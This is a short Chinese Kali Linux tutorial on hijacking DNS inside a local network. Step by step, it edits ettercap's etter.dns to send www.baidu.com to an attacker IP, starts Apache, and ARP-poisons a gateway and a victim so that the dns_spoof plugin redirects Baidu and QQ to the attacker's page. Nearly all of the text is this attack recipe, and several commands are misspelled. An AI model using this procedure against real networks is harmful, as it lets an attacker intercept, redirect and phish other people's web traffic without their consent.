kali linux渗透入门(2)

内网DNS欺骗：

想知道那些劫持网页，广告投放的怎么玩，内网DNS劫持的实现如下:

1.配置劫持服务dns: 

(1) vi /etc/ettercap/etter.dns   进入dns配置文件

(2) www.baidu.com  A  192.168.0.118 (攻击者服务器IP)

2.开启apacha2

(1) severice apacha2 start

3 打开ettercap进行劫持:

(1) ettercap  -G  打开图形界面

(2) Sniff --> Unified sniffing -->eth0(选中网卡)

(2)  Host --> Scan or host --> host list --> 鼠标右键添加target1(网关) 和 target2(被攻击者IP)

(3) Mitm --> ARP poisoning --> (勾选) Sniff remote connections 

(4) Plugns --> Manage the Plugins --> 双击dns_spoof  

(5) Start  --> Start sniffing 开始劫持DNS

不是每次都能成功，劫持效果如下，把百度首页和QQ首页劫持到了攻击者的页面去。

最后结束劫持之后，受害者主机需要ipconfig/flushdns 刷新一下DNS缓存